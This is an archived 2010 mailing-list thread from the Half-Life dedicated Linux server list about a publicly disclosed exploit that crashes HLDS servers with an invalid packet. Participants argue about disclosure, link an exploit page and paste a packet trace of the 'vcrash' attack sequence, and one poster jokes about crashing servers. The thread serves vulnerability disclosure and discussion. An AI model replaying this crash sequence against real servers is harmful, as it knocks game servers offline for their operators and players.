I'm wondering what the hell the developer of that code was thinking... "Oh, yes, there is the possibility of an invalid package, what do we do then? Let's just kill the whole server... return;"
:( -----Original Message----- From: [email protected] [mailto:[email protected]] On Behalf Of Cc2iscooL Sent: Donnerstag, 4. März 2010 23:00 To: Half-Life dedicated Linux server mailing list Subject: Re: [hlds_linux] HLDS exploit ? It's kind of a double-edged sword really. Posting it makes Valve aware and more apt to respond to it, but in the meantime it will circulate around the internets and you'll have a bunch of crashing servers for the next few days. On Thu, Mar 4, 2010 at 3:52 PM, EkaInfinitos <[email protected]> wrote: > Thanks again for posting details about this vulnerability. > > Perhaps the disclosure will garner a expedited solution from Valve... > > > -----Original Message----- > From: [email protected] > [mailto:[email protected]] On Behalf Of Damian > Klimek > Sent: Thursday, March 04, 2010 1434 > To: Half-Life dedicated Linux server mailing list > Subject: Re: [hlds_linux] HLDS exploit ? > > Oh, i mispelled my address > > should be > > http://damianklimek.pl/hlds_exploit/ > > Also - dump of running of vcrash in .pcap [Wireshark format] > > Interesting in packets : 101,103,104,107,108. > > 22:29 -> > 22:29 > 22:29 getchallenge valve > 22:29 > 22:29 <- > 22:29 > 22:29 A00000000 729366743 2 > 22:29 > 22:29 -> > 22:29 > 22:29 connect 48 729366743 > "\prot\3\unique\-1\raw\steam\cdkey\19e5f1e722f4ab6d0d41c82f89c65295" > 22:29 > > "\_cl_autowepswitch\1\bottomcolor\6\cl_dlmax\256\cl_lc\1\cl_lw\1\cl_updatera > te\20\model\gordon\name > 22:29 \uKo8mqLIp6\topcolor\30\rate\25000" > 22:29 HjNuHL"K0 > 22:29 -FRNd}K*KY"*Y,t!F%q_kIhtv2IW|0-rYz#2WL0F$> > 22:29 V-9vDCgmY[b2|ebEE*~oC"""}# > 22:29 > 22:29 <- > 22:29 > 22:29 B 616 "83.11.32.104:61402" 1 > 22:29 > 22:29 -> > 22:29 > 22:29 1E4>[F?i \D^DTDTDVT > 22:29 > > > -> = to server > <- = from server > > > Fix for this is very important - anyone minds playing Clanwar while sb run > this exploit ? > > > -- > Damian > > 2010/3/4 Saul Rennison <[email protected]>: > > It is legal, and thanks for the sploits! LOLOZOLLOZZZ I R CRASHIN UR > SERVAZ! > > > > Thanks, > > - Saul. > > > > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > http://list.valvesoftware.com/mailman/listinfo/hlds_linux > > > _______________________________________________ > To unsubscribe, edit your list preferences, or view the list archives, > please visit: > http://list.valvesoftware.com/mailman/listinfo/hlds_linux > _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds_linux _______________________________________________ To unsubscribe, edit your list preferences, or view the list archives, please visit: http://list.valvesoftware.com/mailman/listinfo/hlds_linux
